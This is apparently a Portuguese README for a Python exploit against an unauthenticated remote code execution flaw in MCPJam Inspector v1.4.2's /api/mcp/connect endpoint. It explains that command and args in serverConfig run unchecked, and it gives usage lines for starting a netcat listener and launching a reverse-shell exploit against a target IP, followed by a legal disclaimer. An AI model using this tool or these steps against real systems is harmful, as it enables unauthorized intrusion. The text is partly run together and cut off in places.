
Esta utilidade foi criada durante pesquisa envolvendo o MCPJam v1.4.2. A aplicação expõe um endpoint de API que aceita um objeto de configuração do servidor. Sob certas condições, validação insuficiente pode permitir execução não intencional de comandos.
O MCPJam Inspector contém uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada no endpoint /api/mcp/connect. A vulnerabilidade permite que atacantes executem comandos arbitrários enviando um payload malicioso de configuração do servidor MCP.
O endpoint aceita um payload JSON com um objeto serverConfig contendo um command e um array args, que são executados diretamente no sistema sem validação ou sanitização adequadas.
requests: pip install requestsnetcat ou socat para ouvinteTerminal 1 - Iniciar Ouvinte:
nc -lvnp 4444
Terminal 2 - Executar Exploit:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# Padrão (porta 6274, porta de callback 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# Porta MCPJam personalizada
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# Porta do ouvinte personalizada
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect⚠️ AVISO LEGAL:
Este exploit é fornecido apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por:
O autor não assume qualquer responsabilidade por uso indevido ou danos causados por esta ferramenta. Use por sua conta e risco.
/api/mcp/connect